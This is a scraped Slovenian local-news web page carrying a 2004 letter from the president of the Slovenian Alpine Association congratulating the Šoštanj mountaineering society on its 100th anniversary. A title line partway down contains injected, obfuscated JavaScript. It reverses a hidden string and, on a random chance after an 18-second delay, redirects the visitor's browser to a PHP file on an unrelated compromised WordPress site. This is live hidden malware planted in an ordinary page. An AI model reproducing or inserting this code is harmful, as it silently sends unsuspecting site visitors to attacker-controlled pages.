Pozdravno pismo predsednika PZS

Planinsko društvo Šoštanj                                  PLANINSKA ZVEZA SLOVENIJE
G. Bojan Rotovnik
Kajuhova cesta 15


3325 ŠOŠTANJ


Ljubljana, 8.1.2004


POZDRAVNO PISMO


Spoštovani g. predsednik PD Šoštanj, g.Rotovnik


Ob otvoritvi praznovanj ob 100-letnici delovanja PD Šoštanj, iskreno čestitam Vam, vsem prisotnim kot tudi vsem ostalim članom PD Šoštanj ob tem dogodku.


Vaše obvestilo o nocojšnji otvoritvi praznovanj, ki ga imate v Mestni galeriji Šoštanj, smo na PZS prejeli včeraj in sem bil o tem zato prepozno obveščen. Žal sem službeno angažiran z v naprej dogovorjenimi obveznostmi ravno v tem terminu.


Praznovanje 100 letnice organiziranega planinskega delovanja pomeni v življenju PD velik dogodek, na katerega ste lahko izredno ponosni. Ponosni ste lahko na ljudi, ki so se odločili za ustanovitev planinskega društva v tistih narodu težkih časih. Ponosni ste lahko na vse aktivne ustvarjalce društvenega življenja, ki so delali življenje v društvu ljudem prijazno. V 100 letih se menja veliko ljudi, ne menja pa se ljubezen do gora. Ta preživi vse nevihte tako, kot jih preživijo gore. Po nevihti se odprejo še lepše, očem in duši bliže.
 
Želel bi Vam še enkrat zaželeti lepo praznovanje in veliko uspehov pri delu v PD v bodoče.


Lep planinski pozdrav       Predsednik PZS
       Mag. Franci Ekar

Sostanj.info183 Posts

Volilni
Planinsko$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}pa v 115. leto delovanja />

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki